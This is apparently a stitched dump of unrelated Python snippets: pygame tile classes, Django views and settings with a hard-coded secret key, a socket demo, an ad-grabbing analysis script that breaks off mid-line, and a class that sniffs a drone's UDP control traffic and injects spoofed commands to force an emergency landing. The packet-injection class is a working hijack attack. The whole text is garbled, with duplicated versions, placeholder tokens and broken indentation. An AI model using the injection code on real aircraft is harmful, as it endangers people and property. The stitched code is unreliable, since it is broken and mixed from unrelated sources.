for j in range(0, len(self.tileGrid[i])):\n self.tileGrid[i][j].update()\n\n\nclass Tile(pygame.sprite.Sprite):\n x = 0\n y = 0\n\n def __init__(self, sprite, x, y, surface):\n super().__init__()\n self.image = pygame.image.load(sprite).convert_alpha()\n self.rect = self.image.get_rect()\n self.x = x\n self.y = y\n self.parentSurface = surface\n self.parentSurface.tileGroup.add(self)\n\n def update(self):\n self.parentSurface.surface.blit(self.image, (self.x, self.y))\n\n\nclass Dirt(Tile):\n\n def __init__(self, x, y, surface):\n spriteVariant = randint(1, 3)\n super().__init__('./assets/dirt0' + str(spriteVariant) + '.png', x,\n y, surface)\n\n\nclass Air(Tile):\n\n def __init__(self, x, y, surface):\n super().__init__('./assets/air.png', x, y, surface)\n", "step-3": "<mask token>\n\n\nclass TileSurface:\n tileGroup = pygame.sprite.Group()\n tileGrid = []\n\n def __init__(self, x, y, width, height):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.surface = pygame.Surface((width, height))\n\n def updatePos(self, x, y):\n self.x = self.x\n self.y = self.y\n\n def generateTiles(self):\n tiles = []\n x = 0\n y = 368\n for i in range(0, 150):\n row = []\n for j in range(0, 150):\n newTile = Dirt(x, y, self)\n newTile.rect.x = x\n newTile.rect.y = y\n row.append(newTile)\n x += 16\n x = 0\n y += 16\n tiles.append(row)\n self.tileGrid = tiles\n\n def drawTiles(self):\n for i in range(0, len(self.tileGrid)):\n for j in range(0, len(self.tileGrid[i])):\n self.tileGrid[i][j].update()\n\n\nclass Tile(pygame.sprite.Sprite):\n x = 0\n y = 0\n\n def __init__(self, sprite, x, y, surface):\n super().__init__()\n self.image = pygame.image.load(sprite).convert_alpha()\n self.rect = self.image.get_rect()\n self.x = x\n self.y = y\n self.parentSurface = surface\n self.parentSurface.tileGroup.add(self)\n\n def update(self):\n self.parentSurface.surface.blit(self.image, (self.x, self.y))\n\n\nclass Dirt(Tile):\n\n def __init__(self, x, y, surface):\n spriteVariant = randint(1, 3)\n super().__init__('./assets/dirt0' + str(spriteVariant) + '.png', x,\n y, surface)\n\n\nclass Air(Tile):\n\n def __init__(self, x, y, surface):\n super().__init__('./assets/air.png', x, y, surface)\n", "step-4": "import pygame\nimport utils\nfrom random import randint\n\n\nclass TileSurface:\n tileGroup = pygame.sprite.Group()\n tileGrid = []\n\n def __init__(self, x, y, width, height):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.surface = pygame.Surface((width, height))\n\n def updatePos(self, x, y):\n self.x = self.x\n self.y = self.y\n\n def generateTiles(self):\n tiles = []\n x = 0\n y = 368\n for i in range(0, 150):\n row = []\n for j in range(0, 150):\n newTile = Dirt(x, y, self)\n newTile.rect.x = x\n newTile.rect.y = y\n row.append(newTile)\n x += 16\n x = 0\n y += 16\n tiles.append(row)\n self.tileGrid = tiles\n\n def drawTiles(self):\n for i in range(0, len(self.tileGrid)):\n for j in range(0, len(self.tileGrid[i])):\n self.tileGrid[i][j].update()\n\n\nclass Tile(pygame.sprite.Sprite):\n x = 0\n y = 0\n\n def __init__(self, sprite, x, y, surface):\n super().__init__()\n self.image = pygame.image.load(sprite).convert_alpha()\n self.rect = self.image.get_rect()\n self.x = x\n self.y = y\n self.parentSurface = surface\n self.parentSurface.tileGroup.add(self)\n\n def update(self):\n self.parentSurface.surface.blit(self.image, (self.x, self.y))\n\n\nclass Dirt(Tile):\n\n def __init__(self, x, y, surface):\n spriteVariant = randint(1, 3)\n super().__init__('./assets/dirt0' + str(spriteVariant) + '.png', x,\n y, surface)\n\n\nclass Air(Tile):\n\n def __init__(self, x, y, surface):\n super().__init__('./assets/air.png', x, y, surface)\n", "step-5": "import pygame\nimport utils\nfrom random import randint\n\nclass TileSurface():\n\n\ttileGroup = pygame.sprite.Group()\n\n\ttileGrid = []\n\n\tdef __init__(self, x, y, width, height):\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.width = width\n\t\tself.height = height\n\t\tself.surface = pygame.Surface((width, height))\n\n\tdef updatePos(self, x, y):\n\t\tself.x = self.x\n\t\tself.y = self.y\n\n\tdef generateTiles(self):\n\t\ttiles = []\n\t\tx = 0\n\t\ty = 368\n\n\t\tfor i in range(0, 150):\n\t\t\trow = []\n\t\t\tfor j in range(0, 150):\n\t\t\t\tnewTile = Dirt(x, y, self)\n\t\t\t\tnewTile.rect.x = x\n\t\t\t\tnewTile.rect.y = y\n\t\t\t\trow.append(newTile)\n\t\t\t\tx += 16\n\t\t\tx = 0\n\t\t\ty += 16\n\t\t\ttiles.append(row)\n\n\t\tself.tileGrid = tiles\n\n\tdef drawTiles(self):\n\t\tfor i in range(0, len(self.tileGrid)):\n\t\t\tfor j in range(0, len(self.tileGrid[i])):\n\t\t\t\tself.tileGrid[i][j].update()\n\n\n\n\nclass Tile(pygame.sprite.Sprite):\n\tx = 0\n\ty = 0\n\n\tdef __init__(self, sprite, x, y, surface):\n\t\t# Call pygame sprite init method\n\t\tsuper().__init__()\n\t\tself.image = pygame.image.load(sprite).convert_alpha() #load a sprite image\n\t\tself.rect = self.image.get_rect() # set collision rectangle\t\t\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.parentSurface = surface\n\n\t\tself.parentSurface.tileGroup.add(self)\n\n\tdef update(self):\n\t\tself.parentSurface.surface.blit(self.image, (self.x, self.y))\t\t\t\n\n\n\nclass Dirt(Tile):\n\tdef __init__(self, x, y, surface):\n\t\tspriteVariant = randint(1, 3)\n\t\tsuper().__init__(\"./assets/dirt0\" + str(spriteVariant) + \".png\", x, y, surface)\n\nclass Air(Tile):\n\tdef __init__(self, x, y, surface):\n\t\tsuper().__init__(\"./assets/air.png\", x, y, surface)", "step-ids": [ 7, 13, 14, 15, 16 ] }
[ 7, 13, 14, 15, 16 ]
from django.shortcuts import render,redirect from django.contrib.auth.decorators import login_required from .form import UserForm, ProfileForm, PostForm from django.contrib import messages from .models import Profile, Projects from django.contrib.auth.models import User from django.http import HttpResponseRedirect # Create your views here. def home(request): return render(request, 'home.html') @login_required(login_url='/accounts/login/') def profile(request): if request.method == 'POST': userform = UserForm(request.POST, instance=request.user) profileform = ProfileForm(request.POST, request.FILES, instance=request.user.profile) if userform.is_valid and profileform.is_valid(): userform.save() profileform.save() messages.success(request, 'Profile updated successfully') return redirect('profile') userform = UserForm() profileform = ProfileForm() curr_profile = Profile.objects.get(username = request.user) curr_projects = Projects.user_projects(request.user) params = {'curr_user': curr_profile, 'curr_project': curr_projects, 'userform':userform, 'profileform':profileform, } return render(request, 'profile/index.html', params) @login_required(login_url='/accounts/login/') def postpoject(request): if request.method == 'POST': postform = PostForm(request.POST, request.FILES) if postform.is_valid: pro = postform.save(commit=False) pro.projectowner = request.user pro.save() return redirect('profile') postform = PostForm() params = {'postform':postform,} return render(request, 'profile/postproject.html', params) @login_required(login_url='/accounts/login/') def userprofile(request, id): try: userdetail = Profile.objects.get(id=id) curr_projects = Projects.user_projects(userdetail.username) if request.user.username == str(userdetail.username): return redirect('profile') else: return render(request, 'userprofile.html', {'userdetail':userdetail, 'curr_projects':curr_projects}) except Profile.DoesNotExist: return HttpResponseRedirect(', Sorry the Page You Looking For Doesnt Exist.') @login_required(login_url='/accounts/login/') def projectdetails(request, id): specproject = Projects.objects.get(id=id) return render(request, 'profile/projectdetails.html', {'specproject':specproject}) def search(request): if 'search' in request.GET and request.GET['search']: search_term = request.GET.get('search') searchresults = Projects.searchProjects(search_term) return render(request, 'search.html', {'searchresults':searchresults, 'search_term':search_term}) else: return redirect('home')
normal
{ "blob_id": "67de51e2a176907fd89793bd3ec52f898130e104", "index": 3713, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\n@login_required(login_url='/accounts/login/')\ndef postpoject(request):\n if request.method == 'POST':\n postform = PostForm(request.POST, request.FILES)\n if postform.is_valid:\n pro = postform.save(commit=False)\n pro.projectowner = request.user\n pro.save()\n return redirect('profile')\n postform = PostForm()\n params = {'postform': postform}\n return render(request, 'profile/postproject.html', params)\n\n\n@login_required(login_url='/accounts/login/')\ndef userprofile(request, id):\n try:\n userdetail = Profile.objects.get(id=id)\n curr_projects = Projects.user_projects(userdetail.username)\n if request.user.username == str(userdetail.username):\n return redirect('profile')\n else:\n return render(request, 'userprofile.html', {'userdetail':\n userdetail, 'curr_projects': curr_projects})\n except Profile.DoesNotExist:\n return HttpResponseRedirect(\n ', Sorry the Page You Looking For Doesnt Exist.')\n\n\n@login_required(login_url='/accounts/login/')\ndef projectdetails(request, id):\n specproject = Projects.objects.get(id=id)\n return render(request, 'profile/projectdetails.html', {'specproject':\n specproject})\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef home(request):\n return render(request, 'home.html')\n\n\n<mask token>\n\n\n@login_required(login_url='/accounts/login/')\ndef postpoject(request):\n if request.method == 'POST':\n postform = PostForm(request.POST, request.FILES)\n if postform.is_valid:\n pro = postform.save(commit=False)\n pro.projectowner = request.user\n pro.save()\n return redirect('profile')\n postform = PostForm()\n params = {'postform': postform}\n return render(request, 'profile/postproject.html', params)\n\n\n@login_required(login_url='/accounts/login/')\ndef userprofile(request, id):\n try:\n userdetail = Profile.objects.get(id=id)\n curr_projects = Projects.user_projects(userdetail.username)\n if request.user.username == str(userdetail.username):\n return redirect('profile')\n else:\n return render(request, 'userprofile.html', {'userdetail':\n userdetail, 'curr_projects': curr_projects})\n except Profile.DoesNotExist:\n return HttpResponseRedirect(\n ', Sorry the Page You Looking For Doesnt Exist.')\n\n\n@login_required(login_url='/accounts/login/')\ndef projectdetails(request, id):\n specproject = Projects.objects.get(id=id)\n return render(request, 'profile/projectdetails.html', {'specproject':\n specproject})\n\n\n<mask token>\n", "step-4": "<mask token>\n\n\ndef home(request):\n return render(request, 'home.html')\n\n\n@login_required(login_url='/accounts/login/')\ndef profile(request):\n if request.method == 'POST':\n userform = UserForm(request.POST, instance=request.user)\n profileform = ProfileForm(request.POST, request.FILES, instance=\n request.user.profile)\n if userform.is_valid and profileform.is_valid():\n userform.save()\n profileform.save()\n messages.success(request, 'Profile updated successfully')\n return redirect('profile')\n userform = UserForm()\n profileform = ProfileForm()\n curr_profile = Profile.objects.get(username=request.user)\n curr_projects = Projects.user_projects(request.user)\n params = {'curr_user': curr_profile, 'curr_project': curr_projects,\n 'userform': userform, 'profileform': profileform}\n return render(request, 'profile/index.html', params)\n\n\n@login_required(login_url='/accounts/login/')\ndef postpoject(request):\n if request.method == 'POST':\n postform = PostForm(request.POST, request.FILES)\n if postform.is_valid:\n pro = postform.save(commit=False)\n pro.projectowner = request.user\n pro.save()\n return redirect('profile')\n postform = PostForm()\n params = {'postform': postform}\n return render(request, 'profile/postproject.html', params)\n\n\n@login_required(login_url='/accounts/login/')\ndef userprofile(request, id):\n try:\n userdetail = Profile.objects.get(id=id)\n curr_projects = Projects.user_projects(userdetail.username)\n if request.user.username == str(userdetail.username):\n return redirect('profile')\n else:\n return render(request, 'userprofile.html', {'userdetail':\n userdetail, 'curr_projects': curr_projects})\n except Profile.DoesNotExist:\n return HttpResponseRedirect(\n ', Sorry the Page You Looking For Doesnt Exist.')\n\n\n@login_required(login_url='/accounts/login/')\ndef projectdetails(request, id):\n specproject = Projects.objects.get(id=id)\n return render(request, 'profile/projectdetails.html', {'specproject':\n specproject})\n\n\n<mask token>\n", "step-5": "from django.shortcuts import render,redirect\nfrom django.contrib.auth.decorators import login_required\nfrom .form import UserForm, ProfileForm, PostForm\nfrom django.contrib import messages\nfrom .models import Profile, Projects\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponseRedirect\n\n\n# Create your views here.\ndef home(request):\n return render(request, 'home.html')\n\n@login_required(login_url='/accounts/login/')\ndef profile(request):\n if request.method == 'POST':\n userform = UserForm(request.POST, instance=request.user)\n profileform = ProfileForm(request.POST, request.FILES, instance=request.user.profile)\n if userform.is_valid and profileform.is_valid():\n userform.save()\n profileform.save()\n messages.success(request, 'Profile updated successfully')\n return redirect('profile')\n\n userform = UserForm()\n profileform = ProfileForm()\n curr_profile = Profile.objects.get(username = request.user)\n curr_projects = Projects.user_projects(request.user)\n params = {'curr_user': curr_profile, \n 'curr_project': curr_projects,\n 'userform':userform,\n 'profileform':profileform,\n }\n return render(request, 'profile/index.html', params)\n\n@login_required(login_url='/accounts/login/')\ndef postpoject(request):\n if request.method == 'POST':\n postform = PostForm(request.POST, request.FILES)\n if postform.is_valid:\n pro = postform.save(commit=False)\n pro.projectowner = request.user\n pro.save()\n return redirect('profile')\n\n postform = PostForm()\n params = {'postform':postform,}\n return render(request, 'profile/postproject.html', params)\n\n@login_required(login_url='/accounts/login/')\ndef userprofile(request, id):\n try:\n userdetail = Profile.objects.get(id=id)\n curr_projects = Projects.user_projects(userdetail.username)\n if request.user.username == str(userdetail.username):\n return redirect('profile')\n else:\n return render(request, 'userprofile.html', {'userdetail':userdetail, 'curr_projects':curr_projects})\n except Profile.DoesNotExist:\n return HttpResponseRedirect(', Sorry the Page You Looking For Doesnt Exist.')\n\n@login_required(login_url='/accounts/login/')\ndef projectdetails(request, id):\n specproject = Projects.objects.get(id=id)\n return render(request, 'profile/projectdetails.html', {'specproject':specproject})\n\n\ndef search(request):\n if 'search' in request.GET and request.GET['search']:\n search_term = request.GET.get('search')\n searchresults = Projects.searchProjects(search_term)\n return render(request, 'search.html', {'searchresults':searchresults, 'search_term':search_term})\n else:\n return redirect('home')\n ", "step-ids": [ 0, 3, 4, 5, 8 ] }
[ 0, 3, 4, 5, 8 ]
""" Simple python script to help learn basic socket API """ import sys, socket HOSTNAME = sys.argv[-2] PORT = sys.argv[-1] options = ( HOSTNAME, int(PORT) ) print options print 'creating socket...' sock = socket.socket() print 'socket created' print 'connecting...' sock.connect(options) print 'connected' print 'sending message...' sock.send('hello') print 'sent message' print 'closing...' sock.close() print 'closed'
normal
{ "blob_id": "e41b5ee0dff30cca51593e737420889bce8f419f", "index": 8563, "step-1": "\"\"\"\nSimple python script to help learn basic socket API\n\"\"\"\n\nimport sys, socket\n\nHOSTNAME = sys.argv[-2]\nPORT = sys.argv[-1]\n\noptions = ( HOSTNAME, int(PORT) )\nprint options\n\nprint 'creating socket...'\nsock = socket.socket()\nprint 'socket created'\n\nprint 'connecting...'\nsock.connect(options)\nprint 'connected'\n\nprint 'sending message...'\nsock.send('hello')\nprint 'sent message'\n\nprint 'closing...'\nsock.close()\nprint 'closed'", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
from django import template register = template.Library() @register.filter(name='phone_number') def phone_number(number): # Convert a 10 character string into (xxx) xxx-xxxx. first = number[0:3] second = number[3:6] third = number[6:10] return '(' + first + ')' + ' ' + second + '-' + third
normal
{ "blob_id": "5e79a8a8fe79aac900fc0c2ff1caaa73ea08ada2", "index": 5697, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\[email protected](name='phone_number')\ndef phone_number(number):\n first = number[0:3]\n second = number[3:6]\n third = number[6:10]\n return '(' + first + ')' + ' ' + second + '-' + third\n", "step-3": "<mask token>\nregister = template.Library()\n\n\[email protected](name='phone_number')\ndef phone_number(number):\n first = number[0:3]\n second = number[3:6]\n third = number[6:10]\n return '(' + first + ')' + ' ' + second + '-' + third\n", "step-4": "from django import template\nregister = template.Library()\n\n\[email protected](name='phone_number')\ndef phone_number(number):\n first = number[0:3]\n second = number[3:6]\n third = number[6:10]\n return '(' + first + ')' + ' ' + second + '-' + third\n", "step-5": "from django import template\n\nregister = template.Library()\n\n\[email protected](name='phone_number')\ndef phone_number(number): # Convert a 10 character string into (xxx) xxx-xxxx.\n\tfirst = number[0:3]\n\tsecond = number[3:6]\n\tthird = number[6:10]\n\treturn '(' + first + ')' + ' ' + second + '-' + third\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
#!/usr/bin/env python3 class interceptThread(threading.Thread): def __init__(self): threading.Thread.__init__(self) self.curPkt = None self.seq = 0 self.foundUAV = False def run(self): sniff(prn=self.interceptPkt, filter='udp port 5556') def interceptPkt(self, pkt): if self.foundUAV == False: print('[*] UAV Found.') self.foundUAV = True self.curPkt = pkt raw = pkt.sprintf('%Raw.load%') try: self.seq = int(raw.split(',')[0].split('=')[-1]) + 5 except: self.seq = 0 def injectCmd(self, cmd): radio = dup.dupRadio(self.curPkt) dot11 = dup.dupDot11(self.curPkt) snap = dup.dupSNAP(self.curPkt) llc = dup.dupLLC(self.curPkt) ip = dup.dupIP(self.curPkt) udp = dup.dupUDP(self.curPkt) raw = Raw(load=cmd) injectPkt = radio / dot11 / llc / snap / ip / udp / raw sendp(injectPkt) EMER = '290717952' def emergencyland(self): spoofSeq = self.seq + 100 watch = 'AT*COMWDG=%i\r'%spoofSeq toCmd = 'AT*REF=%i,%s\r'% (spoofSeq + 1, EMER) self.injectCmd(watch) self.injectCmd(toCmd)
normal
{ "blob_id": "d9908d1ff155390dcd456dd15f92db03f093089e", "index": 8146, "step-1": "#!/usr/bin/env python3\n\nclass interceptThread(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n self.curPkt = None\n self.seq = 0\n self.foundUAV = False\n def run(self):\n sniff(prn=self.interceptPkt, filter='udp port 5556')\n def interceptPkt(self, pkt):\n if self.foundUAV == False:\n print('[*] UAV Found.')\n self.foundUAV = True\n self.curPkt = pkt\n raw = pkt.sprintf('%Raw.load%')\n try:\n self.seq = int(raw.split(',')[0].split('=')[-1]) + 5\n except:\n self.seq = 0\n def injectCmd(self, cmd):\n radio = dup.dupRadio(self.curPkt)\n dot11 = dup.dupDot11(self.curPkt)\n snap = dup.dupSNAP(self.curPkt)\n llc = dup.dupLLC(self.curPkt)\n ip = dup.dupIP(self.curPkt)\n udp = dup.dupUDP(self.curPkt)\n raw = Raw(load=cmd)\n injectPkt = radio / dot11 / llc / snap / ip / udp / raw\n sendp(injectPkt)\nEMER = '290717952'\n def emergencyland(self):\n spoofSeq = self.seq + 100\n watch = 'AT*COMWDG=%i\\r'%spoofSeq\n toCmd = 'AT*REF=%i,%s\\r'% (spoofSeq + 1, EMER)\n self.injectCmd(watch)\n self.injectCmd(toCmd)\n\n\n\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
from __future__ import annotations from .base import * # noqa SECRET_KEY = "django-insecure-usp0sg081f=9+_j95j@-k^sfp+9c*!qrwh-m17%=_9^xot#9fn" DATABASES = { "default": { "ENGINE": "django.db.backends.postgresql", "NAME": "puka-test", "USER": "jeff", "PASSWORD": "", "HOST": "127.0.0.1", "PORT": "5432", }, }
normal
{ "blob_id": "2432e2b4da8af284055e7edf6e0bd94b7b293f0b", "index": 8601, "step-1": "<mask token>\n", "step-2": "<mask token>\nSECRET_KEY = (\n 'django-insecure-usp0sg081f=9+_j95j@-k^sfp+9c*!qrwh-m17%=_9^xot#9fn')\nDATABASES = {'default': {'ENGINE': 'django.db.backends.postgresql', 'NAME':\n 'puka-test', 'USER': 'jeff', 'PASSWORD': '', 'HOST': '127.0.0.1',\n 'PORT': '5432'}}\n", "step-3": "from __future__ import annotations\nfrom .base import *\nSECRET_KEY = (\n 'django-insecure-usp0sg081f=9+_j95j@-k^sfp+9c*!qrwh-m17%=_9^xot#9fn')\nDATABASES = {'default': {'ENGINE': 'django.db.backends.postgresql', 'NAME':\n 'puka-test', 'USER': 'jeff', 'PASSWORD': '', 'HOST': '127.0.0.1',\n 'PORT': '5432'}}\n", "step-4": "from __future__ import annotations\n\nfrom .base import * # noqa\n\nSECRET_KEY = \"django-insecure-usp0sg081f=9+_j95j@-k^sfp+9c*!qrwh-m17%=_9^xot#9fn\"\n\nDATABASES = {\n \"default\": {\n \"ENGINE\": \"django.db.backends.postgresql\",\n \"NAME\": \"puka-test\",\n \"USER\": \"jeff\",\n \"PASSWORD\": \"\",\n \"HOST\": \"127.0.0.1\",\n \"PORT\": \"5432\",\n },\n}\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
#!/usr/bin/env python # coding=utf-8 from django.core.management.base import BaseCommand from BanBanTong.utils import task_scheduler class Command(BaseCommand): ''' 启动BanBanTong.tasks定时任务 ''' def handle(self, *args, **options): task_scheduler.start()
normal
{ "blob_id": "e9c81be79d9107433e00182c27488e64f1ca779f", "index": 1458, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass Command(BaseCommand):\n <mask token>\n\n def handle(self, *args, **options):\n task_scheduler.start()\n", "step-3": "<mask token>\n\n\nclass Command(BaseCommand):\n \"\"\"\n 启动BanBanTong.tasks定时任务\n \"\"\"\n\n def handle(self, *args, **options):\n task_scheduler.start()\n", "step-4": "from django.core.management.base import BaseCommand\nfrom BanBanTong.utils import task_scheduler\n\n\nclass Command(BaseCommand):\n \"\"\"\n 启动BanBanTong.tasks定时任务\n \"\"\"\n\n def handle(self, *args, **options):\n task_scheduler.start()\n", "step-5": "#!/usr/bin/env python\n# coding=utf-8\nfrom django.core.management.base import BaseCommand\nfrom BanBanTong.utils import task_scheduler\n\n\nclass Command(BaseCommand):\n '''\n 启动BanBanTong.tasks定时任务\n '''\n\n def handle(self, *args, **options):\n task_scheduler.start()\n", "step-ids": [ 0, 2, 3, 4, 5 ] }
[ 0, 2, 3, 4, 5 ]
from time import sleep from uuid import uuid1 from pprint import pprint from shutil import copy2 from multiprocessing import Process, Queue, Pool, Manager from ad_grabber_classes import * from adregex import * from pygraph.classes.digraph import digraph import os import json import jsonpickle import subprocess import cPickle import logging LOG = logging.getLogger("logAdGrabber") ADREGEX = AdRegEx() def check_duplicate(fp1, fp2): """takes two files, does a diff on them, returns True if same""" try: subprocess.check_output(['diff', fp1, fp2]) return True except subprocess.CalledProcessError: return False def identify_uniq_ads(session_results): """ i) Identify duplicate ads ii) bin the ads by their dimensions iii) Keep track of the test sites and have many times they have displayed this ad """ # bin by dimensions ads = {} notads = {} swf_bin = {} img_bin = {} error_bugs = [] for train_category, cat_dict in session_results.items(): for test_site, bug_dict_list in cat_dict.items(): for index_count in range(len(bug_dict_list)): bug_dict = bug_dict_list[index_count] for bug, bug_count in bug_dict.items(): bug_filetype = bug.get_filetype() bug_filepath = bug.get_filepath() if bug_filepath == '': #LOG.debug('did not manage to curl the scripts for bug:%s' % bug) error_bugs.append(bug) continue if bug.is_ad(): # give zerofucks to non-ads height = '999' width = '999' if bug_filetype == 'swf': # choose from the swf media bin target_bin = swf_bin try: width = subprocess.check_output(['swfdump', '-X', bug_filepath]).split(' ')[-1].strip() height = subprocess.check_output(['swfdump', '-Y', bug_filepath]).split(' ')[-1].strip() except subprocess.CalledProcessError : LOG.exception("swfdump error on file %s" % bug_filepath) else: # choose from the img media bin target_bin = img_bin LOG.debug(bug_filepath) try: height = subprocess.check_output(['identify', '-format', '"%h"',\ bug_filepath]).strip() width = subprocess.check_output(['identify', '-format','"%w"',\ bug_filepath]).strip() except subprocess.CalledProcessError: LOG.exception("identify error on file %s" % bug_filepath) try: bug.set_dimension(height, width) dimension = '%s-%s' % (height, width) # check all the images in the bin with the dimensions m_list = target_bin[dimension] dup = None for m in m_list: if check_duplicate(bug_filepath, m.get_filepath()): dup = m break if dup: # check if the duplicate ad came from a different test site if test_site in ads[dup]: ads[dup][test_site] += bug_count else : ads[dup] = {test_site : bug_count} # delete old bug reference, add new one and point to duplicated # bug del bug_dict[bug] bug_dict[dup] = bug_count else: target_bin[dimension].append(bug) ads[bug] = {test_site : bug_count} # tally up the results except KeyError: # The bin hasn't been created target_bin[dimension] = [bug] ads[bug] = {test_site : bug_count} # else: # notads return ads,error_bugs def export_uniq_ads(ads, out_folder, rel_folder): """ Takes all the uniq ads seen in this session and writes its metadata information to a csv file """ try : os.makedirs(out_folder) os.makedirs(os.path.join(out_folder, rel_folder)) except OSError: LOG.debug('Creating output folder') fwtr = open(os.path.join(out_folder, 'uniq_ads.csv'), 'w') # Relative location = Location of the ad within this current session # Global location, added when an ad is matched with existing ads in DB fwtr.write('#UID, Ad-Company, Ad-Filetype, Height, Width, Rel-Location, src\n') for bug in ads.keys(): height, width = bug.get_dimension() filepath = bug.get_filepath() name = bug.get_name() src = bug.get_src() filetype = bug.get_filetype() new_uuidname = '%s.%s' % (uuid1(), filetype) bug.set_uuid(new_uuidname) new_filepath = os.path.join(out_folder, new_uuidname) rel_filepath = os.path.join(rel_folder, new_uuidname) copy2(filepath, new_filepath) fwtr.write('{0}, {1}, {2}, {3}, {4}, {5}, {6}\n'.format(new_uuidname, name, filetype, height, width, rel_filepath, src)) fwtr.close() return ads def write_run_info(RUNINFO_DIR, session_date): # write to a file in runinfo_dir to tell automation script this run is done fp = os.path.join(RUNINFO_DIR, '%s.info' % session_date) with open(fp, 'w') as fwtr: fwtr.write('OK') def write_session_info(vmid, machineid, profile, session_date, train_mode, training_sites, test_sites, num_of_refresh, export_folder): train_category = training_sites.keys()[0] train_sites_to_visit = training_sites[train_category] with open(os.path.join(export_folder, 'session_info.csv'), 'w') as fwtr: fwtr.write('session_str : %s\n' % session_date) fwtr.write('machine_info : %s\n' % machineid) fwtr.write('vmid : %s\n' % vmid) fwtr.write('profile : %s\n' % profile) fwtr.write('train_mode : %s\n' % train_mode) fwtr.write('num_of_refresh : %d\n' % num_of_refresh) fwtr.write('training_topic : %s\n' % train_category) fwtr.write('training_sites : ') for site in train_sites_to_visit: fwtr.write('%s, ' % site) fwtr.write('\nnum_of_train_sites : %d\n' % len(train_sites_to_visit)) fwtr.write('test_sites : ') for site in test_sites: fwtr.write('%s, ' % site[1]) fwtr.write('\nnum_of_test_sites : %d\n' % len(test_sites)) def generate_stats(results, ads, vmid, session_date, export_folder, process_ex_time): """ Generates stats on - uniq ads seen on the test sites - total number of ads seen on the test sites - total number of ads seen on all test sites - total number of uniq ads seen on all test sites """ try: os.makedirs(export_folder) except OSError: pass # to be read and inserted into db totalads = 0 # total number of ads seen during this session totaluniqads = len(ads) # does not support multicategories at this point # for each category, for each test site, count total number of ads seen totalad_category = {} # for each category, for each test site, count total number of uniq ads seen uniqad_category = {} with open(os.path.join(export_folder, 'session_bugs.csv'), 'w') as bugs_wtr: bugs_wtr.write('#Ad-UID, Website-URL, Refresh-Num, Training-Topic,\ Site-Context, BugCount, BugSrc\n') for train_category, cat_dict in results.items(): totalad_category[train_category] = {} uniqad_category[train_category] = {} for test_site, bug_dict_list in cat_dict.items(): total_ads = 0 # for each site uniq_ads = [] # for each site for refresh_num in range(len(bug_dict_list)): bug_dict = bug_dict_list[refresh_num] for bug, bugcount in bug_dict.items(): if bug.is_ad(): uuid = bug.get_uuid() bugs_wtr.write('{0}, {1}, {2}, {3}, {4}, {5}, {6}\n'.format(uuid, test_site, refresh_num, train_category, 'N/A', bugcount, bug.get_src())) total_ads += bugcount if bug not in uniq_ads: uniq_ads.append(bug) totalad_category[train_category][test_site] = total_ads uniqad_category[train_category][test_site] = len(uniq_ads) totalads += total_ads # global count for total ads with open(os.path.join(export_folder, 'session_stats.csv'), 'w') as ses_wtr: # write some metadata information about this session ses_wtr.write('#VMID: %s\n' % vmid) ses_wtr.write('#Session-Date: %s\n' % session_date) ses_wtr.write('#Time to complete: %s\n' % process_ex_time) ses_wtr.write('#Training Categories: %s\n' % str(results.keys())) ses_wtr.write('#Total Number of ads: %d\n' % totalads) ses_wtr.write('#Total Uniq ads: %d\n\n' % totaluniqads) ses_wtr.write('#TrainingTopic, Test-Site, NumberOfVisit, TotalAds, UniqAds\n') for train_category, cat_dict in results.items(): for test_site, bug_dict_list in cat_dict.items(): num_of_visit = len(bug_dict_list) ses_wtr.write('{0}, {1}, {2}, {3}, {4}\n'.format(train_category, test_site, num_of_visit, totalad_category[train_category][test_site], uniqad_category[train_category][test_site])) def export_ads(results,out_folder): """ This function creates a csv file which contains all the unique ads seen in each test site (including all the refreshes) TODO update the doc results is a dictionary of the following results = { Category : Value, ... } value = { test_site_url : [ result1, result2, ... resultN], ... } resultN : { WebBug : count, ... } """ try: os.makedirs(out_folder) except OSError: LOG.debug('Creating output file folder ...') export_ad_counter = 1 # assign unique number to ads for export to mturk #short_listed_companies = ['google adsense', 'doubleclick'] with open(os.path.join(out_folder,'ad_labelling.csv'), 'w') as fwtr: # write the titles fwtr.write('#{0}, {1}, {2}, {3}, {4}, {5}, {6}, {7}, {8}, {9}\n'.format(\ 'Ad#', 'Company', 'FileType', 'Ad-Category', 'Website-URL',\ 'Refresh-Num','Training-Topic', 'Context-of-site', 'Total', 'Ad-src')) # make sure we only add one ad for train_category, cat_dict in results.items(): for test_site, bug_dict_list in cat_dict.items(): for refresh_num in range(len(bug_dict_list)): bug_dict = bug_dict_list[refresh_num] for bug, bugcount in bug_dict.items(): if not bug.is_ad(): #TODO check bug_type in ffext continue if bug.get_filetype() in ['swf', 'png', 'gif', 'jpg']: file_name = '%d.%s' % (export_ad_counter, bug.get_filetype()) new_location = os.path.join(out_folder, file_name) copy2(bug.get_filepath(), new_location) fwtr.write('{0}, {1}, {2}, {3}, {4}, {5}, {6}, {7} , {8}, {9},\ \n'.format(file_name, bug.get_name(), bug.get_filetype(), '' ,test_site, refresh_num, train_category, 'N/A', bugcount, bug.get_src())) export_ad_counter += 1 def get_bug_type(file_type): is_ad = False bug_type = 'text' if file_type.startswith('HTML') or \ file_type.startswith('ASCII') or \ file_type.startswith('UTF-8 Unicode English') or \ file_type.startswith('very short') : bug_type = 'text' elif (file_type.endswith('1 x 1') and file_type.startswith('GIF')): bug_type = 'gif' elif file_type.startswith('PNG'): bug_type = 'png' is_ad = True elif file_type.startswith('GIF'): bug_type = 'gif' is_ad = True elif file_type.startswith('Macromedia Flash'): bug_type = 'swf' is_ad = True elif file_type.startswith('JPEG'): bug_type = 'jpg' is_ad = True return bug_type, is_ad def parse_buginfo(entry): """ Takes the json decoded bug information and inserts it into a WebBug instance """ bugname = 